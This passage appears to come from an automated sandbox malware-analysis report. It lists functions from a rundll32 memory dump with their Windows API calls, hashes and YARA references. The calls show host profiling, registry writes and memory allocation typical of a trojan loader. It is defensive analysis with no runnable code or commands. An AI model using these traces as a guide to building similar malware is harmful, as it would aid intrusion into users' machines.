                              • Part of subcall function 04F779A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,04F7FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 04F77A2F
                            • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7FC63
                            • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7FC6B
                            • lstrlen.KERNEL32(?), ref: 04F7FC75
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7FC8A
                            • wsprintfA.USER32 ref: 04F7FCC6
                            • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 04F7FCE5
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7FCFA
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7FD07
                            • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7FD15
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                            • String ID:
                            • API String ID: 168057987-0
                            • Opcode ID: 8faca9da266c505adb8040312597e1d4d21fa3779e8d7da8417b01098c45284f
                            • Instruction ID: 2df63915ee23934bc69635dbbca9b5d97acbbcc6557ee3f2d9bf608cfdad443d
                            • Opcode Fuzzy Hash: 8faca9da266c505adb8040312597e1d4d21fa3779e8d7da8417b01098c45284f
                            • Instruction Fuzzy Hash: 8831A131A00319BFDB11AF64EC44E6BBFE9EF44314F00082AF954AA151D778AD199BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6F39B Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                            • GetLastError.KERNEL32 ref: 04F6F3E5
                            • WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                            • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                            • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                            • SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                            • GetLastError.KERNEL32 ref: 04F6F483
                            • CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                            • String ID:
                            • API String ID: 2864405449-0
                            • Opcode ID: bcf7d962fb70cd833fc0808e5b6754f98378131d9f006422ac3ee30b19624472
                            • Instruction ID: f3228c06a9fd744709d40eed21b9c166baa8520cb4560007dd5c2de558a24fcf
                            • Opcode Fuzzy Hash: bcf7d962fb70cd833fc0808e5b6754f98378131d9f006422ac3ee30b19624472
                            • Instruction Fuzzy Hash: 85316D7190020CBFEB10DFA9EC49BAE7BB8EF04325F208155F912A61D0D7749E55DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F8068D Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,04F65674,00000008,?,00000010,00000001,00000000,0000003A), ref: 04F806AC
                            • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 04F806E0
                            • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 04F806E8
                            • GetLastError.KERNEL32 ref: 04F806F2
                            • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 04F8070E
                            • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 04F80727
                            • CancelIo.KERNEL32(?), ref: 04F8073C
                            • CloseHandle.KERNEL32(?), ref: 04F8074C
                            • GetLastError.KERNEL32 ref: 04F80754
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                            • String ID:
                            • API String ID: 4263211335-0
                            • Opcode ID: 16bc41fdd5a0cddd6be5fa735c715b4c4781b3beefa8af21379fff52b608f5c6
                            • Instruction ID: a392ab5bb3c2a375e742295249c49b2f16e23d28fc26255ec3ab9df43fdfb3f1
                            • Opcode Fuzzy Hash: 16bc41fdd5a0cddd6be5fa735c715b4c4781b3beefa8af21379fff52b608f5c6
                            • Instruction Fuzzy Hash: C5214F7690021DBFCB01AFA5EC889EE7B79FF44310F51802AF916DA140DB749A59CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F71C19 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04F6E231,00000000,7620F5B0,04F70348,?,00000001), ref: 04F71C25
                            • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04F71C3B
                            • _snwprintf.NTDLL ref: 04F71C60
                            • CreateFileMappingW.KERNEL32(000000FF,04F8A1E8,00000004,00000000,00001000,?), ref: 04F71C7C
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04F71C8E
                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04F71CA5
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04F71CC6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04F71CCE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: 5479a5888e4d3fcb81cd18a11c9423e92d41e8d7b5185c817bc58d43095c3bfb
                            • Instruction ID: 78cad1be818dca9f18f8856e4dc1539163aac6df3f7eb1f8049266a87ec25199
                            • Opcode Fuzzy Hash: 5479a5888e4d3fcb81cd18a11c9423e92d41e8d7b5185c817bc58d43095c3bfb
                            • Instruction Fuzzy Hash: 4421D872B40208FBD721AF94DD05FED3BB9EB44750F204026F615EB280E674E906DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7CB5A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(00000000,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?,00000000,00000000,00000000), ref: 04F7CC58
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F7CC7B
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 04F7CC83
                            • lstrlenW.KERNEL32(00000000,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?), ref: 04F7CCCE
                            • memcpy.NTDLL(00000000,?,?,?), ref: 04F7CD36
                            • LocalFree.KERNEL32(?,?), ref: 04F7CD4F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                            • String ID: P
                            • API String ID: 3649579052-3110715001
                            • Opcode ID: b6a60912b7e9982668cd1721fa312346f210635ff79fca0bd0133db0a8d87cee
                            • Instruction ID: 4ab43083b1d5bc355ed92cbfa8a30c6854e1681afea7e8a1e604f5f614906a1c
                            • Opcode Fuzzy Hash: b6a60912b7e9982668cd1721fa312346f210635ff79fca0bd0133db0a8d87cee
                            • Instruction Fuzzy Hash: D8613F71E0014EAFDF11DFA9EC88DBE7BB9EF45704B04806AF515AB250D738A906DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7C563 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F8148E: InterlockedIncrement.KERNEL32(00000018), ref: 04F814DF
                              • Part of subcall function 04F8148E: RtlLeaveCriticalSection.NTDLL(0631C378), ref: 04F8156A
                            • OpenProcess.KERNEL32(00000410,B8F475FF,04F72289,00000000,00000000,04F72289,0000001C,00000000,00000000,?,?,?,04F72289), ref: 04F7C5BD
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,04F72299,00000104,?,?,?,04F72289), ref: 04F7C5DB
                            • GetSystemTimeAsFileTime.KERNEL32(04F72289), ref: 04F7C643
                            • lstrlenW.KERNEL32(C78BC933), ref: 04F7C6B8
                            • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 04F7C6D4
                            • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 04F7C6EC
                              • Part of subcall function 04F6F307: RtlLeaveCriticalSection.NTDLL(?), ref: 04F6F384
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                            • String ID: o
                            • API String ID: 2541713525-252678980
                            • Opcode ID: 8ed8e85d755db8186cda8d55ce9626c63a2733936eec534d86e98388974fd9e2
                            • Instruction ID: 5b52fec2b76512280a35f7057bfc66ed971d697decc18ef2c6562bcb32960613
                            • Opcode Fuzzy Hash: 8ed8e85d755db8186cda8d55ce9626c63a2733936eec534d86e98388974fd9e2
                            • Instruction Fuzzy Hash: 4D5172B1A1064AABD710DF64DC88FAAB7E8FF04704F10452AE509DB140EB78E9468B94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6A316 Relevance: 12.2, APIs: 8, Instructions: 209timeCOMMON
                            Download Yara Rule
                            APIs
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F6A391
                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04F6A3BD
                            • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 04F6A3CD
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 04F6A405
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 04F6A427
                            • GetShellWindow.USER32 ref: 04F6A436
                              • Part of subcall function 04F72986: GetShellWindow.USER32 ref: 04F729A4
                              • Part of subcall function 04F72986: GetVersion.KERNEL32 ref: 04F72A46
                              • Part of subcall function 04F72986: GetVersion.KERNEL32 ref: 04F72A54
                            • GetLastError.KERNEL32(?), ref: 04F6A521
                            • CloseHandle.KERNEL32(?), ref: 04F6A535
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                            • String ID:
                            • API String ID: 2436285880-0
                            • Opcode ID: f7c902b5f6ad1af9ffe733accf7eeefc5646942b9c59f201c9d2626b15a9d420
                            • Instruction ID: 2e49cfec8647b5a14175d943112257e106351af92f5db115f218d5079ec7afc5
                            • Opcode Fuzzy Hash: f7c902b5f6ad1af9ffe733accf7eeefc5646942b9c59f201c9d2626b15a9d420
                            • Instruction Fuzzy Hash: C27169B1908305AFD710EF64DC8486BBBE9FB89354F004A2EF596E7250D330ED468B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F67A61 Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7B7A4: RegCreateKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7B9
                              • Part of subcall function 04F7B7A4: lstrlen.KERNEL32(0631B7F0,00000000,00000000,00000000,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008,00000003), ref: 04F7B7E2
                            • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04F67AA6
                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04F67ABE
                            • HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67B20
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F67B34
                            • WaitForSingleObject.KERNEL32(00000000,?,04F787CC,?,?), ref: 04F67B86
                            • HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67BAF
                            • HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67BBF
                            • RegCloseKey.ADVAPI32(?,?,04F787CC,?,?), ref: 04F67BC8
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                            • String ID:
                            • API String ID: 3503961013-0
                            • Opcode ID: eda82196eedbf74b6b7f98560a19ba121fe57b0738207ea4028381e897482611
                            • Instruction ID: 9a05442b0de93e1f19b436ed5f07b6dd27ffa067849ee03ee63552fb59d3b79d
                            • Opcode Fuzzy Hash: eda82196eedbf74b6b7f98560a19ba121fe57b0738207ea4028381e897482611
                            • Instruction Fuzzy Hash: 2541A4B5D0021DFFDF01AFA4DC848EEBBB9FF08318F10446AE516A6210D6395A95EF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6AAAF Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,04F6A1A1), ref: 04F6AAC5
                            • wsprintfA.USER32 ref: 04F6AAED
                            • lstrlen.KERNEL32(?), ref: 04F6AAFC
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • wsprintfA.USER32 ref: 04F6AB3C
                            • wsprintfA.USER32 ref: 04F6AB71
                            • memcpy.NTDLL(00000000,?,?), ref: 04F6AB7E
                            • memcpy.NTDLL(00000008,04F853E8,00000002,00000000,?,?), ref: 04F6AB93
                            • wsprintfA.USER32 ref: 04F6ABB6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                            • String ID:
                            • API String ID: 2937943280-0
                            • Opcode ID: 7887d1d263893e784c0eb795011f3993e58cd169404c6ac94be132c563e203cc
                            • Instruction ID: 4eba03811b2740114ea84372c977df26ac23808d83eaf17270e55c2e716e00d7
                            • Opcode Fuzzy Hash: 7887d1d263893e784c0eb795011f3993e58cd169404c6ac94be132c563e203cc
                            • Instruction Fuzzy Hash: 2C410CB1A00209EFDB11DF98D884EAEB7FDEF45308B144559F959EB211EA34FA05CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F816C6 Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04F816F0
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81703
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04F81715
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04F76C8E), ref: 04F81739
                            • GetComputerNameW.KERNEL32(00000000,?), ref: 04F81747
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F8175E
                            • GetComputerNameW.KERNEL32(00000000,?), ref: 04F8176F
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04F76C8E), ref: 04F81795
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: bddab8a3df43fce26d785baa66147e09d629509239d0393337d46ba537ee1c91
                            • Instruction ID: b2e5adc235a3f976e0b99eb8c46305bc82a7a9c07aa4bff087be7218122f0734
                            • Opcode Fuzzy Hash: bddab8a3df43fce26d785baa66147e09d629509239d0393337d46ba537ee1c91
                            • Instruction Fuzzy Hash: 0531DCB6A0010DAFDB00EFB5ED84CBEBBFAEB44244B50856DE505DB200D734AE469B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F763D1 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?), ref: 04F763F5
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F76407
                            • wcstombs.NTDLL ref: 04F76415
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?), ref: 04F76439
                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04F7644E
                            • mbstowcs.NTDLL ref: 04F7645B
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?,?), ref: 04F7646D
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?,?), ref: 04F76487
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                            • String ID:
                            • API String ID: 316328430-0
                            • Opcode ID: bfc7284513b56d34f3d29a891ac8a58383779b486d0eef8cf6348f859ef3232a
                            • Instruction ID: b00f916154aa54f6fc3c234b8a6f6cdffa6b55e32ba4d9e489075907bd9f5b25
                            • Opcode Fuzzy Hash: bfc7284513b56d34f3d29a891ac8a58383779b486d0eef8cf6348f859ef3232a
                            • Instruction Fuzzy Hash: 6F212C7190020EFFDF119FA4EC48EAB7BB9EB44314F10412ABA14EA160D7799D65EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6D922 Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(04F7E453,00000000,00000000,04F8A440,?,?,04F6F68B,04F7E453,00000000,04F7E453,04F8A420), ref: 04F6D935
                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04F6D943
                            • wsprintfA.USER32 ref: 04F6D95F
                            • RegCreateKeyA.ADVAPI32(80000001,04F8A420,00000000), ref: 04F6D977
                            • lstrlen.KERNEL32(?), ref: 04F6D986
                            • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 04F6D994
                            • RegCloseKey.ADVAPI32(?), ref: 04F6D99F
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6D9AE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                            • String ID:
                            • API String ID: 1575615994-0
                            • Opcode ID: 7f5b68b20088bd34a3c6342757b7f833cfe089b46ecf9c7bdbbee55699e3d5ce
                            • Instruction ID: 54f001cf3950b8fd9e9c55d07ff279170cbbe9f2ed77acf2b9ffea85f7c746e9
                            • Opcode Fuzzy Hash: 7f5b68b20088bd34a3c6342757b7f833cfe089b46ecf9c7bdbbee55699e3d5ce
                            • Instruction Fuzzy Hash: CC111B7260010DBFEB015F94FC49EBA3B79EB89714F104029FA059A150D6B99D55ABA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7FE06 Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 04F7FE12
                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F7FE30
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F7FE38
                            • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 04F7FE56
                            • GetLastError.KERNEL32 ref: 04F7FE6A
                            • RegCloseKey.ADVAPI32(?), ref: 04F7FE75
                            • CloseHandle.KERNEL32(00000000), ref: 04F7FE7C
                            • GetLastError.KERNEL32 ref: 04F7FE84
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                            • String ID:
                            • API String ID: 3822162776-0
                            • Opcode ID: 6a325338f03a876163bbd8326ff7b3cd5735516ceedc2c1aac6fb7abf2ceb22f
                            • Instruction ID: 83a7f30ffa3657466b5b0bf0d7d7538972bfbc5babbcc8353590d36bf026386d
                            • Opcode Fuzzy Hash: 6a325338f03a876163bbd8326ff7b3cd5735516ceedc2c1aac6fb7abf2ceb22f
                            • Instruction Fuzzy Hash: 20111B7620020DBFDB015FA4EC48EBA3B69EB88351F10502AFA06CA241DB79DD55DB71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6941B Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: f9f596bc778bdef9721547396155503a683b6e4b673773cd59f87a34907562b6
                            • Instruction ID: 37d62c227d852c5a6ff6b72082ac8ea0cda28483466866aaab5bd8acf666b27f
                            • Opcode Fuzzy Hash: f9f596bc778bdef9721547396155503a683b6e4b673773cd59f87a34907562b6
                            • Instruction Fuzzy Hash: 0DB103B1D00219EFEF219FA4DD48AAEBBB5EF05314F004066E812B7160D7B5AE46DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F823FD Relevance: 11.5, APIs: 9, Instructions: 296COMMON
                            Download Yara Rule
                            APIs
                            • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,04F82801,?), ref: 04F8242E
                            • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 04F8243B
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,04F82801,00000000,00000001,?,?,?,?,04F82801,?,00000000), ref: 04F825C9
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$AllocateHeap
                            • String ID:
                            • API String ID: 4068229299-0
                            • Opcode ID: ed9614d03ae4fb573294049ce2ed80e763d78e57c8ce7181edf82aaac56b1f23
                            • Instruction ID: 364c39aec6ae2db64b17e8f82163f1be1de21aa9ea67f360db1dc270e72f37e4
                            • Opcode Fuzzy Hash: ed9614d03ae4fb573294049ce2ed80e763d78e57c8ce7181edf82aaac56b1f23
                            • Instruction Fuzzy Hash: 3AB11D71A0020AABDF11EF95DD80EAF77A9BF04304F0581A9F915AF151E734FA16CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6BA6B Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCommandLineA.KERNEL32(04F860F0,00000038,04F6E22A,00000000,7620F5B0,04F70348,?,00000001,?,?,?,?,?,?,?,04F69100), ref: 04F6BA7C
                            • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F6BA8D
                              • Part of subcall function 04F6D4DA: lstrlen.KERNEL32(?,00000000,761B6980,00000000,04F6DA7B,?), ref: 04F6D4E3
                              • Part of subcall function 04F6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 04F6D506
                              • Part of subcall function 04F6D4DA: memset.NTDLL ref: 04F6D515
                            • ExitProcess.KERNEL32 ref: 04F6BC6F
                              • Part of subcall function 04F6A8E9: StrChrA.SHLWAPI(00000020,?,76ECD3B0,0631C304,00000000,?,04F66584,?), ref: 04F6A90E
                              • Part of subcall function 04F6A8E9: StrTrimA.SHLWAPI(00000020,04F85FCC,00000000,?,04F66584,?), ref: 04F6A92D
                              • Part of subcall function 04F6A8E9: StrChrA.SHLWAPI(00000020,?,?,04F66584,?), ref: 04F6A939
                            • lstrcmp.KERNEL32(?,?), ref: 04F6BAFB
                            • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,04F69100,?), ref: 04F6BB13
                              • Part of subcall function 04F64BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0631B7F0,?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000), ref: 04F64C04
                              • Part of subcall function 04F64BC4: CloseHandle.KERNEL32(000000FF,?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C), ref: 04F64C0F
                            • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,04F69100,?), ref: 04F6BB85
                            • lstrcmp.KERNEL32(?,?), ref: 04F6BB9E
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                            • String ID:
                            • API String ID: 739714153-0
                            • Opcode ID: 0fbea2f19f16c077fef3d549b1786fefa347df1f47954734150f87c094629c72
                            • Instruction ID: f2b76d7836726fa537d7e77475bc21787759c9b6c8f781449eecfcee59263911
                            • Opcode Fuzzy Hash: 0fbea2f19f16c077fef3d549b1786fefa347df1f47954734150f87c094629c72
                            • Instruction Fuzzy Hash: FE513071D10229EFDF11AFA0DC85DEEBB79EF09704F144429E112EA154DB39BA42CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7948C Relevance: 10.6, APIs: 7, Instructions: 138memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 04F794B7
                            • StrTrimA.SHLWAPI(00000000,?), ref: 04F794D4
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F79507
